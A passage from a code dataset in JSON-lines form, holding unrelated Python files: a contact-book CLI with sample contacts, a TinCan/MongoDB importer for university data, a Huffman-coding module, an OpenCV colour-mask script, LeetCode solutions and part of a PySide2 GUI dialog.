'Omari',\n last_name = 'Ninoshvili',\n phone_number = '986-120-1236',\n email = 'omargs@mail.com',\n birthday = '10/30/200'\n)\nOmari.save()\nPatta = Person(\n first_name = 'Patta',\n last_name = 'Borjomi',\n phone_number = '678-340-9876',\n email = 'pattalab@mail.com',\n birthday = '09/30/2001'\n)\nPatta.save()\nAnna = Person(\n first_name = 'Anna',\n last_name = 'Mamodze',\n phone_number = '571-897-3452',\n email = 'annatya@mail.com',\n birthday = '11/02/2009'\n)\nAnna.save()\nGiorgi = Person(\n first_name = 'Giorgi',\n last_name = 'Nonoiashvil',\n phone_number = '555-876-0093',\n email = 'Giorginan@mail.com',\n birthday = '03/30/1982'\n)\nGiorgi.save()\nNatela = Person(\n first_name = 'Natela',\n last_name = 'Baliako',\n phone_number = '555-120-1643',\n email = 'natelabsd@mail.com',\n birthday = '03/05/2008'\n)\nNatela.save()\nDato = Person(\n first_name = 'Dato',\n last_name = 'Guraspashvili',\n phone_number = '555-987-0964',\n email = 'datojgf@mail.com',\n birthday = '01/06/2010'\n)\nDato.save()\nNika = Person(\n first_name = 'Nika',\n last_name = 'Sakashvili',\n phone_number = '555-090-1283',\n email = 'nikaso@mail.com',\n birthday = '07/30/1783'\n)\nNika.save()\nPapuna = Person(\n first_name = 'Papauna',\n last_name = 'Papaskiri',\n phone_number = '555-449-0089',\n email = 'papunaeee@mail.com',\n birthday = '10/01/2007'\n)\nPapuna.save()\nMaka = Person(\n first_name = 'Maka',\n last_name = 'Blaxamishvili',\n phone_number = '555-298-0983',\n email = 'makaiut@mail.com',\n birthday = '10/03/2000'\n)\nMaka.save()\nJabo = Person(\n first_name = 'Jabo',\n last_name = 'Rosiko',\n phone_number = '555-987-9873',\n email = 'noklass@mail.com',\n birthday = '04/11/1975'\n)\nJabo.save()\nScoot = Person(\n first_name = 'Scoot',\n last_name = 'Dior',\n phone_number = '155-654-9543',\n email = 'scootri@mail.com',\n birthday = '10/03/1891'\n)\nScoot.save()\nWako = Person(\n first_name = 'Wako',\n last_name = 'Mamuashvili',\n phone_number = '555-876-1543',\n email = 'mamunsk@mail.com',\n birthday = '01/15/2000'\n)\nWako.save()\nMariami = Person(\n first_name = 'Mariami',\n last_name = 'Berianidze',\n phone_number = '555-140-1643',\n email = 'mariamioyb@mail.com',\n birthday = '08/09/2008'\n)\nMariami.save()\nSoso = Person(\n first_name = 'Soso',\n last_name = 'Bodare',\n phone_number = '557-220-2643',\n email = 'soson@mail.com',\n birthday = '07/08/1988'\n)\nSoso.save()\nDatuna = Person(\n first_name = 'Datuna',\n last_name = 'Lkaon',\n phone_number = '667-829-5658',\n email = 'datunammm@mail.com',\n birthday = '09/10/1989'\n)\nDatuna.save()\n\nNodo = Person(\n first_name = 'Nodo',\n last_name = 'Noniashvili',\n phone_number = '222-429-5018',\n email = 'nodoppp@mail.com',\n birthday = '07/01/1980'\n)\nNodo.save()\n\n## Ending populating database\n\n#Display all of the Contacts\n\ndef show_contact():\n contacts = Person.select()\n for contact in contacts:\n print(contact.first_name, contact.last_name)\n show = input(\"Enter a last name for all of the contact information \\nthis is case sensative: \")\n try:\n contact = Person.get(Person.last_name == show)\n print(f'\\n\\nFull Name: {contact.first_name} {contact.last_name} \\nBirthday: {contact.birthday} \\nPhone Number: {contact.phone_number} \\nEmail: {contact.email} \\n')\n introduction()\n except: #Exception as error:\n print('That name does not exist')\n introduction()\n \n### Create a New Contact\ndef create_contact():\n new_first_name = input('Insert First Name: ')\n new_last_name = input('Insert Last Name: ')\n new_birthday = input('Insert Birthday: ')\n new_phone_number = input('Insert Phone Number: ')\n new_email = input('Insert Email Address: ')\n \n add_contact = Person(\n first_name = new_first_name,\n last_name = new_last_name,\n birthday = new_birthday,\n phone_number = new_phone_number,\n email = new_email\n )\n add_contact.save()\n introduction()\n\n# Update the contacts\n\ndef update_contact():\n contacts = Person.select()\n for contact in contacts:\n print(contact.first_name, contact.last_name)\n last_n = input('Enter the last name of the contact you want to update \\nThis is Case Sensative: ')\n try:\n if last_n == Person.last_name:\n print(' 1: First name \\n 2: Last name \\n 3: Birthday \\n 4: Phone number \\n 5: Email Address')\n ask = input('Enter number of subject to update: ')\n if ask == '1':\n contact = Person.get(Person.last_name == last_n)\n contact.first_name = input('New first name: ')\n contact.save()\n introduction()\n elif ask == '2':\n contact = Person.get(Person.last_name == last_n)\n contact.last_name = input('New last name: ')\n contact.save()\n introduction()\n elif ask == '3':\n contact = Person.get(Person.last_name == last_n)\n contact.birthday = input('New birthday: ')\n contact.save()\n introduction()\n elif ask == '4':\n contact = Person.get(Person.last_name == last_n)\n contact.phone = input('New phone number: ')\n contact.save()\n introduction()\n elif ask == '5':\n contact = Person.get(Person.last_name == last_n)\n contact.email = input('New email: ')\n contact.save()\n introduction()\n else:\n introduction()\n except:\n print('That person does not exist')\n introduction()\n\n#super careful and fun delete function\n\ndef delete_contact():\n tester = input('Are you want to delete one of these hot mamas? y/n: ')\n if tester == 'n':\n print('thought not!')\n introduction()\n if tester == 'y':\n contacts = Person.select()\n for contact in contacts:\n print(contact.first_name, contact.last_name)\n bye = input('Which frienemy do you want to get rid off? \\n Enter last name: ')\n try: \n bye == Person.last_name\n sure = input('Are you sure you want to get rid of them? y/n: ')\n if sure == 'y':\n contact = Person.get(Person.last_name == bye)\n contact.delete_instance()\n introduction()\n else:\n delete_contact()\n except:\n print(\"that person doesn't exist....yet\")\n introduction()\n\n introduction()\n\n#Function for the interactive menu\ndef introduction():\n print('\\n\\nWelcome to Levani Contact Book \\n 1: Show Contacts \\n 2: Create Contact \\n 3: Update Contact \\n 4: Delete Contact \\n 5: Exit')\n greet = input('Enter the number of what you want to do: ')\n if greet == '1':\n show_contact()\n elif greet == '2':\n create_contact()\n elif greet == '3':\n update_contact()\n elif greet == '4':\n delete_contact()\n elif greet == '5':\n print('GURL, You are done! BYE!!')\n os._exit(1)\n else:\n print('GURL, that is not an option, k?')\n introduction()\n\n### Start your engines\nintroduction()\n\n\n","sub_path":"lib/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"219680182","text":"import csv\nimport uuid\nimport datetime\nimport json\nimport sys\n\nfrom pymongo import Connection\nfrom tincan import (\n RemoteLRS,\n Statement,\n Agent,\n AgentAccount,\n Verb,\n Activity,\n Context,\n LanguageMap,\n ActivityDefinition,\n StateDocument,\n Extensions,\n Result\n)\n\n\"\"\"\n\"\"\"\ndef create_AEP_statement(row):\n\n\tcod_element, estat_solicitud, any_acad_valida, desc_estat, any_academico, idp, num_expedient, asigna_clase, estat, num_creditos, cod_plan = row\n\tstatement = Statement({\n\t 'actor': Agent({\n\t \t'account': AgentAccount({\n\t \t\t'name': idp,\n\t \t}),\n\t }),\n\t 'verb': Verb({\n\t\t 'id': 'http://la.uoc.edu/verb/aeprequest',\n\t\t 'display': LanguageMap({'en-US': 'AEP Request'}),\n\t\t}),\n\t 'object': Activity({\n\t \t'id': 'http://la.uoc.edu/object/subject/code/%s' % cod_element,\n\t\t\t'definition': ActivityDefinition({\n\t\t\t\t'extensions': Extensions({\n\t\t\t\t\t'edu:uoc:la:subject': {\n\t\t\t\t\t\t'code': cod_element,\n\t\t\t\t\t\t'credits': num_creditos,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:plan': {\n\t\t\t\t\t\t'code': cod_plan,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:semester': {\n\t\t\t\t\t\t'code': any_academico,\n\t\t\t\t\t\t'validated': any_acad_valida,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:expedient': {\n\t\t\t\t\t\t'code': num_expedient,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:aep': {\n\t\t\t\t\t\t'status': estat,\n\t\t\t\t\t\t'classification': asigna_clase\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t})\n\t }),\n\t 'result': Result({\n\t \t'success': estat == 'A',\n\t }),\n\t 'timestamp': datetime.datetime.utcnow(),\n\t\t'context': Context({\n\t\t 'registration': uuid.uuid4(),\n\t\t})\n\t})\n\treturn json.loads(statement.to_json())\n\n\"\"\"\n\"\"\"\ndef create_Matricula_statement(row):\n\n\tdivision, num_expediente, any_academico, inv_estado_expediente, idp, anula_matricula, motiu_anulacio, cod_plan, desc_plan, cod_estudios, desc_estudios, tipo_educacion, oficial_propi, cod_area, desc_area = row\n\tstatement = Statement({\n\t 'actor': Agent({\n\t \t'account': AgentAccount({\n\t \t\t'name': idp,\n\t \t}),\n\t }),\n\t 'verb': Verb({\n\t\t 'id': 'http://la.uoc.edu/verb/enrolment',\n\t\t 'display': LanguageMap({'en-US': 'Enrolment'}),\n\t\t}),\n\t 'object': Activity({\n\t \t'id': 'http://la.uoc.edu/object/expedient/code/%s' % num_expediente,\n\t\t\t'definition': ActivityDefinition({\n\t\t\t\t'extensions': Extensions({\n\t\t\t\t\t'edu:uoc:la:expedient': {\n\t\t\t\t\t\t'code': num_expediente,\n\t\t\t\t\t\t'division': division,\n\t\t\t\t\t\t'status': inv_estado_expediente,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:semester': {\n\t\t\t\t\t\t'code': any_academico,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:plan': {\n\t\t\t\t\t\t'code': cod_plan,\n\t\t\t\t\t\t'description': desc_plan,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:study': {\n\t\t\t\t\t\t'code': cod_estudios,\n\t\t\t\t\t\t'description': desc_estudios,\n\t\t\t\t\t\t'type': tipo_educacion,\n\t\t\t\t\t\t'official': oficial_propi,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:area': {\n\t\t\t\t\t\t'code': cod_area,\n\t\t\t\t\t\t'description': desc_area,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:enrolment': {\n\t\t\t\t\t\t'cancelation': {\n\t\t\t\t\t\t\t'date': anula_matricula,\n\t\t\t\t\t\t\t'reason': motiu_anulacio,\n\t\t\t\t\t\t},\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t})\n\t }),\n\t 'result': Result({\n\t \t'success': not anula_matricula,\n\t }),\n\t 'timestamp': datetime.datetime.utcnow(),\n\t\t'context': Context({\n\t\t 'registration': uuid.uuid4(),\n\t\t})\n\t})\n\treturn json.loads(statement.to_json())\n\n\"\"\"\n\"\"\"\ndef create_ass_matr_statement(row):\n\n\tcod_asignatura, any_academic, userid, idp = row\n\tstatement = Statement({\n\t 'actor': Agent({\n\t \t'account': AgentAccount({\n\t \t\t'name': idp,\n\t \t}),\n\t }),\n\t 'verb': Verb({\n\t\t 'id': 'http://la.uoc.edu/verb/subject/enrolment',\n\t\t 'display': LanguageMap({'en-US': 'Enrolment'}),\n\t\t}),\n\t 'object': Activity({\n\t \t'id': 'http://la.uoc.edu/object/subject/code/%s' % cod_asignatura,\n\t\t\t'definition': ActivityDefinition({\n\t\t\t\t'extensions': Extensions({\n\t\t\t\t\t'edu:uoc:la:subject': {\n\t\t\t\t\t\t'code': cod_asignatura\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:semester': {\n\t\t\t\t\t\t'code': any_academic,\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t})\n\t }),\n\t 'result': Result({\n\t }),\n\t 'timestamp': datetime.datetime.utcnow(),\n\t\t'context': Context({\n\t\t 'registration': uuid.uuid4(),\n\t\t})\n\t})\n\treturn json.loads(statement.to_json())\n\n\"\"\"\n\"\"\"\ndef create_Performance_statement(row):\n\n\tdivision, num_expediente, idp, cod_asignatura, desc_assignatura, af, nf, supera_s_n, seguiment_ac_s_n, tipus_examen, qe, qualificacio_teorica, nota_prova_validacio, cod_estudios, desc_estudios, codi_aula, any_academic = row\n\tstatement = Statement({\n\t 'actor': Agent({\n\t \t'account': AgentAccount({\n\t \t\t'name': idp,\n\t \t}),\n\t }),\n\t 'verb': Verb({\n\t\t 'id': 'http://la.uoc.edu/verb/performance',\n\t\t 'display': LanguageMap({'en-US': 'Enrolment'}),\n\t\t}),\n\t 'object': Activity({\n\t \t'id': 'http://la.uoc.edu/object/expedient/code/%s' % num_expediente,\n\t\t\t'definition': ActivityDefinition({\n\t\t\t\t'extensions': Extensions({\n\t\t\t\t\t'edu:uoc:la:expedient': {\n\t\t\t\t\t\t'code': num_expediente,\n\t\t\t\t\t\t'division': division,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:subject': {\n\t\t\t\t\t\t'code': cod_asignatura,\n\t\t\t\t\t\t'description': desc_assignatura,\n\t\t\t\t\t\t'evaluation': {\n\t\t\t\t\t\t\t'af': af,\n\t\t\t\t\t\t\t'nf': nf,\n\t\t\t\t\t\t\t'ac': {\n\t\t\t\t\t\t\t\t'follows': seguiment_ac_s_n == 'Si',\n\t\t\t\t\t\t\t\t'pass': supera_s_n == 'Si',\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t'examType': tipus_examen,\n\t\t\t\t\t\t\t'qe': qe,\n\t\t\t\t\t\t\t'qt': qualificacio_teorica,\n\t\t\t\t\t\t\t'validationTest': {\n\t\t\t\t\t\t\t\t'qualification': nota_prova_validacio\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:semester': {\n\t\t\t\t\t\t'code': any_academic,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:study': {\n\t\t\t\t\t\t'code': cod_estudios,\n\t\t\t\t\t\t'description': desc_estudios,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:classroom': {\n\t\t\t\t\t\t'code': codi_aula,\n\t\t\t\t\t},\n\t\t\t\t})\n\t\t\t})\n\t }),\n\t 'result': Result({\n\t }),\n\t 'timestamp': datetime.datetime.utcnow(),\n\t\t'context': Context({\n\t\t 'registration': uuid.uuid4(),\n\t\t})\n\t})\n\treturn json.loads(statement.to_json())\n\n\"\"\"\n\"\"\"\ndef create_login_logout_statement(row):\n\n print(row)\n if len(row) == 5:\n userid, login, logout, ip, lastaction = row\n else:\n return json.loads(\"{}\")\n\n try:\n logintime = datetime.datetime.strptime(login, \"%d%m%Y%H%M%S\").isoformat()\n logouttime = datetime.datetime.strptime(logout, \"%d%m%Y%H%M%S\").isoformat()\n lastactiontime = datetime.datetime.strptime(lastaction, \"%d%m%Y%H%M%S\").isoformat()\n except ValueError:\n logintime = ''\n logouttime = ''\n lastactiontime = ''\n\n statement = Statement({\n\t 'actor': Agent({\n\t \t'account': AgentAccount({\n\t \t\t'name': userid,\n\t \t}),\n\t }),\n\t 'verb': Verb({\n\t\t 'id': 'http://la.uoc.edu/verb/login',\n\t\t 'display': LanguageMap({'en-US': 'Login'}),\n\t\t}),\n\t 'object': Activity({\n\t \t'id': 'http://la.uoc.edu/object/login',\n\t\t\t'definition': ActivityDefinition({\n\t\t\t\t'extensions': Extensions({\n\t\t\t\t\t'edu:uoc:la:campus': {\n 'userid': userid,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:login': {\n 'login': logintime,\n 'logout': logouttime,\n 'lastactiontime': lastactiontime,\n },\n\t\t\t\t})\n\t\t\t})\n\t }),\n\t 'result': Result({\n\t }),\n\t 'timestamp': datetime.datetime.utcnow(),\n\t\t'context': Context({\n\t\t 'registration': uuid.uuid4(),\n\t\t})\n\t})\n return json.loads(statement.to_json())\n\n\"\"\"\n\"\"\"\ndef import_aep(collection):\n\twith open('data/Dataset_Graus_2008-09_20141_Assig_Conv_Adap_AEP.csv', 'rb') as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=';', quotechar='\"')\n\t\tnext(reader, None)\n\t\tcollection.insert([create_AEP_statement(row) for row in reader])\n\n\"\"\"\n\"\"\"\ndef import_enrolment(collection):\n\twith open('data/Dataset_Graus_2008-09_20141_Matricula.csv', 'rb') as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=';', quotechar='\"')\n\t\tnext(reader, None)\n\t\tcollection.insert([create_Matricula_statement(row) for row in reader])\n\n\"\"\"\n\"\"\"\ndef import_performance(collection):\n\twith open('data/Dataset_Graus_2008-09_20141_Rendiment_Assignatures.csv', 'rb') as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=';', quotechar='\"')\n\t\tnext(reader, None)\n\t\tcollection.insert([create_Performance_statement(row) for row in reader])\n\n\"\"\"\n\"\"\"\ndef import_assmatr(collection):\n with open('data/matricula_per_usuaris_i_aules.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=';', quotechar='\"')\n next(reader, None)\n collection.insert([create_ass_matr_statement(row) for row in reader])\n\"\"\"\n\"\"\"\ndef import_login_logout(collection):\n with open('data/loginhistory.csv', 'rU') as csvfile:\n reader = csv.reader(csvfile, delimiter=';', quotechar='\"')\n next(reader, None)\n for row in reader:\n collection.insert(create_login_logout_statement(row))\n\n\"\"\"\n\"\"\"\ncsv.field_size_limit(sys.maxsize)\n\nconnection = Connection('localhost', 27017)\ndb = connection.lrs\ncollection = db.statements\n#import_aep(collection)\n#import_enrolment(collection)\n#import_performance(collection)\n#import_assmatr(collection)\nimport_login_logout(collection)\n","sub_path":"import/src/import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":8802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"125778456","text":"from bangazon import *\nimport random\n\nclass Employee():\n\n\tdef __init__(self, fn, ln):\n\t\tself.name = fn + \" \" + ln\n\t\t\n\tdef get_name(self):\n\t\treturn self.name\n\n# eat() - Will select a random restaurant name from a list of strings, print to console that the employee at at that restaurant, and also return the restaurant.\n\n\tdef eat(self, food = \"\", companions = \"\"):\n\t\trestaurants = [\"Biscuit Head\", \"Tupelo Honey\", \"Five Mile\", \"Rhubarb\"]\n\t\trestaurant_picker = random.choice(restaurants)\n\t\tspace = \" \"\n\t\t\n\t\tif (food == \"sandwich\"):\n\t\t\tprint(\"{} ate a sandwich at the office.\".format(self.name))\n\n\n\t\telif (companions != \"\" and food != \"\"):\n\t\t\tprint(\"{} went to {} with {} and ate {}\".format(self.name, restaurant_picker, space.join(companions), food))\n\n\t\t\n\t\telif (companions != \"\"):\n\t\t\tspace = \" \"\n\t\t\tprint(\"{} ate lunch at {} with {}\".format(self.name, restaurant_picker, space.join(companions)))\n\t\t\n\t\telse:\n\t\t\tprint(\"{} is at {}\".format(self.name, restaurant_picker))\n\t\t\treturn restaurant_picker\n\n\n\n\n","sub_path":"class_employee.py","file_name":"class_employee.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"367116697","text":"from collections import defaultdict, namedtuple\nfrom heapq import heappush, heappop, heapify\nfrom pathlib import Path\nimport struct\nimport numpy as np\n\nNode = namedtuple('Node', 'freq value left right')\nNode.__lt__ = lambda x, y: x.freq < y.freq\n\n\ndef huffman_encode(arr, save_dir='./'):\n \"\"\"\n Encodes numpy array 'arr' and saves to save_dir\n The names of binary files are prefixed with prefix\n returns the number of bytes for the tree and the data after the compression\n \"\"\"\n if len(arr) == 0:\n return 0, 0\n\n # Infer dtype\n dtype = str(arr.dtype)\n\n # Calculate frequency in arr\n freq_map = defaultdict(int)\n convert_map = {'float32': float, 'int32': int}\n for value in np.nditer(arr):\n value = convert_map[dtype](value)\n freq_map[value] += 1\n\n # Make heap\n heap = [Node(frequency, value, None, None) for value, frequency in freq_map.items()]\n heapify(heap)\n\n # Merge nodes\n while len(heap) > 1:\n node1 = heappop(heap)\n node2 = heappop(heap)\n merged = Node(node1.freq + node2.freq, None, node1, node2)\n heappush(heap, merged)\n\n # Generate code value mapping\n value2code = dict()\n\n def generate_code(node, code):\n if node is None:\n return\n if node.value is not None:\n value2code[node.value] = code\n return\n generate_code(node.left, code + '0')\n generate_code(node.right, code + '1')\n\n root = heappop(heap)\n generate_code(root, '')\n\n # Path to save location\n directory = Path(save_dir)\n\n # Dump data\n data_encoding = ''.join(value2code[convert_map[dtype](value)] for value in np.nditer(arr))\n datasize = dump(data_encoding)\n\n # Dump codebook (huffman tree)\n codebook_encoding = encode_huffman_tree(root, dtype)\n treesize = dump(codebook_encoding)\n\n return treesize, datasize\n\n\n# Logics to encode / decode huffman tree\n# Referenced the idea from https://stackoverflow.com/questions/759707/efficient-way-of-storing-huffman-tree\ndef encode_huffman_tree(root, dtype):\n \"\"\"\n Encodes a huffman tree to string of '0's and '1's\n \"\"\"\n converter = {'float32':float2bitstr, 'int32':int2bitstr}\n code_list = list()\n\n def encode_node(node):\n if node.value is not None: # node is leaf node\n code_list.append('1')\n lst = list(converter[dtype](node.value))\n code_list.extend(lst)\n else:\n code_list.append('0')\n encode_node(node.left)\n encode_node(node.right)\n\n encode_node(root)\n return ''.join(code_list)\n\n\ndef decode_huffman_tree(code_str, dtype):\n \"\"\"\n Decodes a string of '0's and '1's and costructs a huffman tree\n \"\"\"\n converter = {'float32': bitstr2float, 'int32': bitstr2int}\n idx = 0\n\n def decode_node():\n nonlocal idx\n info = code_str[idx]\n idx += 1\n if info == '1': # Leaf node\n value = converter[dtype](code_str[idx: idx+32])\n idx += 32\n return Node(0, value, None, None)\n else:\n left = decode_node()\n right = decode_node()\n return Node(0, None, left, right)\n\n return decode_node()\n\n\n# My own dump / load logics\ndef dump(code_str):\n \"\"\"\n code_str : string of either '0' and '1' characters\n this function dumps to a file\n returns how many bytes are written\n \"\"\"\n # Make header (1 byte) and add padding to the end\n # Files need to be byte aligned.\n # Therefore we add 1 byte as a header which indicates how many bits are padded to the end\n # This introduces minimum of 8 bits, maximum of 15 bits overhead\n num_of_padding = -len(code_str) % 8\n header = \"{:08b}\".format(num_of_padding)\n code_str = header + code_str + '0' * num_of_padding\n\n # Convert string to integers and to real bytes\n byte_arr = bytearray(int(code_str[i:i+8], 2) for i in range(0, len(code_str), 8))\n # Dump to a file\n return len(byte_arr)\n\n\ndef load(filename):\n \"\"\"\n This function reads a file and makes a string of '0's and '1's\n \"\"\"\n with open(filename, 'rb') as f:\n header = f.read(1)\n rest = f.read() # bytes\n code_str = ''.join('{byte:08b}' for byte in rest)\n offset = ord(header)\n if offset != 0:\n code_str = code_str[:-offset] # string of '0's and '1's\n return code_str\n\n\n# Helper functions for converting between bit string and (float or int)\ndef float2bitstr(f):\n four_bytes = struct.pack('>f', f) # bytes\n return ''.join('{:08b}'.format(byte) for byte in four_bytes) # string of '0's and '1's\n\n\ndef bitstr2float(bitstr):\n byte_arr = bytearray(int(bitstr[i:i+8], 2) for i in range(0, len(bitstr), 8))\n return struct.unpack('>f', byte_arr)[0]\n\n\ndef int2bitstr(integer):\n four_bytes = struct.pack('>I', integer) # bytes\n return ''.join('{:08b}'.format(byte) for byte in four_bytes) # string of '0's and '1's\n\n\ndef bitstr2int(bitstr):\n byte_arr = bytearray(int(bitstr[i:i+8], 2) for i in range(0, len(bitstr), 8))\n return struct.unpack('>I', byte_arr)[0]\n\n\n# Functions for calculating / reconstructing index diff\ndef calc_index_diff(indptr, maxdiff):\n org_diff = indptr[1:] - indptr[:-1]\n diff = list()\n for v in org_diff:\n n = v / maxdiff\n for i in range(int(n)):\n diff.append(maxdiff)\n v -= maxdiff\n diff.append(v)\n return np.array(diff).astype(np.float32)\n\n\ndef calc_indice_diff(indices, maxdiff):\n org_diff = indices[1:] - indices[:-1]\n diff = list()\n for v in org_diff:\n if v > 0:\n n = v / maxdiff\n for i in range(int(n)):\n diff.append(maxdiff)\n v -= maxdiff\n diff.append(v)\n else:\n diff.append(abs(v))\n return np.array(diff).astype(np.float32)\n\n\ndef reconstruct_indptr(diff):\n return np.concatenate([[0], np.cumsum(diff)])\n\n\n# Encode / Decode models\ndef huffman_encode_model(model, directory='encodings/'):\n t0, d0 = huffman_encode(model, directory)\n \n # Print statistics\n original = model.nbytes\n compressed = t0 + d0\n \n original_total = original\n compressed_total = compressed\n\n print('original:{} bytes; after:{} bytes'.format(original_total, compressed_total))\n\n return original_total, compressed_total, t0, d0\n","sub_path":"huffmancoding.py","file_name":"huffmancoding.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"543729375","text":"\nimport cv2\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom matplotlib import pyplot as plt\n\nparser = ArgumentParser()\nparser.add_argument(\"image_path\", type=str, help=\"imagen a procesar\")\nparser.add_argument(\"hue_threshold\", type=float, help=\"umbral de hue\")\nargs = parser.parse_args()\n\nx1 = 190\ny1 = 140\nx2 = 530\ny2 = 480\n\nimg = cv2.imread(args.image_path)\noutput = img.copy()\n\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HLS)\ncrop = hsv[y1:y2, x1:x2]\n\ntarget_hue = cv2.calcHist([crop], [0], None, [181], [0, 180])\ncv2.normalize(target_hue, target_hue, 0, 99, cv2.NORM_MINMAX)\n\nh, w, c = hsv.shape\nhue_mask = np.zeros((h, w), dtype=np.uint8)\nsat_mask = np.zeros((h, w), dtype=np.uint8)\nlum_mask = np.zeros((h, w), dtype=np.uint8)\n\n#luminosity threshold\nlum_max = crop[:, :, 1].max()\nlum_min = crop[:, :, 1].min()\n#saturation threshold\nsat_max = crop[:, :, 2].max()\nsat_min = crop[:, :, 2].min()\n\n#produce masks\nfor x in (x for x in range(w)):\n for y in (y for y in range(h)):\n if target_hue[hsv[y, x, 0]] >= args.hue_threshold:\n hue_mask[y, x] = 255\n if lum_min <= hsv[y, x, 1] <= lum_max:\n lum_mask[y, x] = 255\n if sat_min <= hsv[y, x, 2] <= sat_max:\n sat_mask[y, x] = 255\n\noutput[:, :, 0] &= (hue_mask & lum_mask & sat_mask)\noutput[:, :, 1] &= (hue_mask & lum_mask & sat_mask)\noutput[:, :, 2] &= (hue_mask & lum_mask & sat_mask)\n\ncv2.imshow(\"source\", img)\ncv2.imshow(\"crop\", cv2.cvtColor(crop, cv2.COLOR_HLS2BGR))\ncv2.imshow(\"output\", output)\ncv2.waitKey(0)","sub_path":"Patrones/Tarea4/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"283632973","text":"# 5476. 找出数组游戏的赢家.py\nfrom typing import List\n\n\nclass Solution:\n def getWinner(self, arr: List[int], k: int) -> int:\n n = len(arr)\n if k >= n - 1:\n return max(arr)\n i = 0\n cont = 0\n while cont < k:\n if arr[i] > arr[i + 1]:\n arr.append(arr[i + 1])\n arr[i + 1] = arr[i]\n cont += 1\n else:\n arr.append(arr[i])\n cont = 1\n i += 1\n return arr[i]\n\n\nclass Solution:\n def getWinner(self, arr: List[int], k: int) -> int:\n if k >= len(arr) - 1:\n return max(arr)\n cur, tmp = arr[0], k\n for i in range(1, len(arr)):\n if cur > arr[i]:\n tmp -= 1\n else:\n cur = arr[i]\n tmp = k - 1\n if tmp == 0:\n return cur\n return cur\n\n\ndef main():\n sol = Solution()\n\n arr = [2, 1, 3, 5, 4, 6, 7]\n k = 2\n res = sol.getWinner(arr, k)\n print(res)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Week08/周赛(不要去死磕)/5476. 找出数组游戏的赢家.py","file_name":"5476. 找出数组游戏的赢家.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"82529070","text":"# Runtime 98ms, Beats 62.84%\n# Basic idea: Siliding window\nclass Solution(object):\n def checkInclusion(self, s1, s2):\n \"\"\"\n :type s1: str\n :type s2: str\n :rtype: bool\n \"\"\"\n dic = {}\n for i in s1:\n dic[i] = dic.get(i,0)+1\n lens = len(s1)\n idx,sw,sw_s,dic2 = 0,0,0,{}\n while idx= len(A):\n window[B[i - len(A)]] -= 1\n if window == target:\n return True\n return False\n \n","sub_path":"Two Pointer/567.Permutation in String.py","file_name":"567.Permutation in String.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"409230690","text":"from PySide2 import QtWidgets, QtGui, QtCore\nimport numpy as np\nfrom fseutil.lib.fse_thermal_radiation_3d import single_receiver, heat_flux_to_temperature\nfrom fseutil.etc.images_base64 import dialog_0404_br187_perpendicular_figure_1\nfrom fseutil.gui.layout.dialog_0405_thermal_radiation_extreme import Ui_MainWindow\n\n\nclass Dialog0405(QtWidgets.QMainWindow):\n maximum_acceptable_thermal_radiation_heat_flux = 12.6\n\n def __init__(self, parent=None):\n super(Dialog0405, self).__init__(parent)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.setWindowTitle('Thermal Radiation Analysis Extreme')\n\n from fseutil.gui.logic.common import filter_objects_by_name\n for i in filter_objects_by_name(self.ui.groupBox_out, object_types=[QtWidgets.QLineEdit]):\n try:\n i.setReadOnly(True)\n except AttributeError:\n i.setEnabled(False)\n\n # set up radiation figure\n ba = QtCore.QByteArray.fromBase64(dialog_0404_br187_perpendicular_figure_1)\n pix_map = QtGui.QPixmap()\n pix_map.loadFromData(ba)\n self.ui.label.setPixmap(pix_map)\n\n # set default values\n self.ui.lineEdit_in_emitter_points.setText('1000')\n self.ui.lineEdit_in_receiver_initial_temperature.setText('293.15')\n\n # set signals\n self.ui.pushButton_test.clicked.connect(self.test)\n self.ui.pushButton_calculate.clicked.connect(self.calculate)\n\n def keyPressEvent(self, event):\n if event.key() == 16777221 or event.key() == 16777220 or event.key() == QtCore.Qt.Key_Enter:\n self.copy_file_name()\n elif event.key() == 